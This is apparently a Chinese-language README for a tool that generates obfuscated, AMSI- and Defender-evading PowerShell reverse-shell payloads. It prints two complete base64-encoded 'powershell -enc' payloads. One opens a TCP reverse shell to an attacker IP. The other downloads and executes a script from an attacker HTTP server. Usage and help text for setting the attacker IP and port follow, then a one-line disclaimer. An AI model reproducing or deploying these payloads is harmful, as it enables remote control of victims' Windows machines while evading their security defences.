gunzf0x/BypassAMSI_PSRevshell

# BypassAMSI PowerShell Revshell ## "Revshell" 命令 基于原始的 [Nishang Reverse shell PS oneliner](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1) 生成一个经过混淆的 `PowerShell` 反向 Shell payload。 ### 用法 ``` python3 BypassAMSI_PSRevshell.py revshell -i -p ``` 例如： ``` ❯ python3 BypassAMSI_PSRevshell.py revshell -i 10.10.10.10 -p 4444 ``` 将生成 payload： ``` powershell -enc JABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADAALgAxADAAJwAsADQANAA0ADQAKQA7ACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMALgBSAGUAYQBkACgAJABiACwAIAAwACwAIAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIALAAwACwAIAAkAGkAKQA7ACQAcwBiACAAPQAgACgAaQBlAHgAIAAkAGQAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGIAMgAgACAAPQAgACQAcwBiACAAKwAgACcAUABTACAAJwAgACsAIAAnAD4AIAAnADsAJABzAHkAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAyACkAOwAkAHMALgBXAHIAaQB0AGUAKAAkAHMAeQAsADAALAAkAHMAeQAuAEwAZQBuAGcAdABoACkAOwAkAHMALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMALgBDAGwAbwBzAGUAKAApAA== ``` ## "Server" 命令 此选项将创建一个 payload 文件，默认命名为 `revshell.ps1`（即将 `revshell` 命令生成的混淆 payload 写入文件），并通过临时 HTTP 服务器将其公开（默认端口为 `8000`，也可更改）。随后，脚本将生成一个编码后的 payload，该 payload 会向临时服务器请求文件，执行它并触发反向 Shell。 ### 用法 ``` python3 BypassAMSI_PSRevshell.py server -i -p ``` 例如： ``` ❯ python3 BypassAMSI_PSRevshell.py server -i 10.10.10.10 -p 4444 --server-port 9000 ``` 将生成 payload： ``` powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAA6ADkAMAAwADAALwByAGUAdgBzAGgAZQBsAGwALgBwAHMAMQAiACkA ``` 在受害者机器上执行它将向公开的 HTTP 服务器发出请求并获取 payload 文件。 ## 帮助信息 ``` ❯ python3 BypassAMSI_PSRevshell.py revshell -h usage: python3 BypassAMSI_PSRevshell.py revshell [-h] -i ATTACKER_IP -p PORT [-v] [--keep-pwd] [--enc-b64] [--no-banner] Generate an obfuscated PowerShell payload to avoid Windows Defender options: -h, --help show this help message and exit -i ATTACKER_IP, --attacker-ip ATTACKER_IP Attacker IP address. -p PORT, --port PORT Port to get revshell. -v, --verbose Display payloads used and generated, along with some extra info. --keep-pwd Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender. --enc-b64 Encode in base64 the Attacker IP address and port provided to the payload. --no-banner Do not print script banner. Example: BypassAMSI_PSRevshell.py revshell -i 10.10.16.98 -p 4444 ``` ``` ❯ python3 BypassAMSI_PSRevshell.py server -h usage: python3 BypassAMSI_PSRevshell.py server [-h] -i ATTACKER_IP -p PORT [--server-port SERVER_PORT] [-o OUTFILE] [-v] [--keep-pwd] [--keep-file] [--enc-b64] [--no-banner] Generate an obfuscated PowerShell payload to avoid Windows Defender options: -h, --help show this help message and exit -i ATTACKER_IP, --attacker-ip ATTACKER_IP Attacker IP address serving temporal HTTP server. -p PORT, --port PORT Listening port to get reverse shell. --server-port SERVER_PORT Port serving temporal HTTP server. Default: 8000. -o OUTFILE, --outfile OUTFILE Name of the temporal PowerShell file storing obfuscated payload. Default: revshell.ps1 -v, --verbose Display payloads used and generated, along with some extra info. --keep-pwd Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender. --keep-file This script will create a file named as "--outfile" flag and then is deleted. Use this flag if you want to keep the generated file/payload. --enc-b64 Encode in base64 the Attacker IP address and port provided to the payload. --no-banner Do not print script banner. Example: BypassAMSI_PSRevshell.py server -i 10.10.16.98 ``` ## 免责声明 使用本工具的风险由您自行承担。请遵守道德规范 (:

标签：AI合规, AMSI绕过, C2通信, DNS 反向解析, IPv6, Nishang, OpenCanary, Payload生成, PowerShell, Python, Windows Defender, 代码混淆, 反向Shell, 嗅探欺骗, 威胁检测, 安全测试, 恶意软件生成, 攻击性安全, 无后门, 权限维持, 横向移动, 编码执行, 编程规范, 网络安全, 远程控制, 隐私保护